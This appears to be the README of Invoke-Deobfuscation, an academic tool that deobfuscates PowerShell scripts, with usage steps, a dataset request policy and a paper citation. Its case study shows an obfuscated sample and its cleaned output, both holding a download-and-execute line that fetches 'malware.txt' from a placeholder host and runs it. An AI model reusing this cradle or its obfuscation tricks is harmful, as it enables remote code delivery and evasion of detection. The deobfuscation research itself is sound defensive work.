-
Environment
-
How to use it?
git clone https://gitee.com/snowroll/invoke-deobfuscation cd invoke-deobfuscation/Code pwsh # Linux or MacOS Import-Module ./Invoke-DeObfuscation.psd1 DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
-
Case Study
-
demo.ps1
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h') $xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG' $lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA=' $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs)) .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
-
Result
Write-Host hello $var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG' $var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA=' $var2 = 'https://test.com/malware.txt' .('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
-
-
DataSet Request
If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
- You need to send me an email with a copy to both my mentor yinglingyun@qianxin.com and your mentor.
- In the body of the email, you need to state the purpose of the dataset request and the use of the dataset.
- Moreover, you need to clearly indicate that the results generated by the dataset will cite our paper.
The full dataset is not public. If you would like to collaborate on research, please feel free to contact us
-
Citation
@inproceedings{chai2022invoke, title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts}, author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren}, booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)}, pages={295--306}, year={2022}, organization={IEEE} }
XingTuLab/Invoke-Deobfuscation
Folders and files
| Name | Name | Last commit date | ||
|---|---|---|---|---|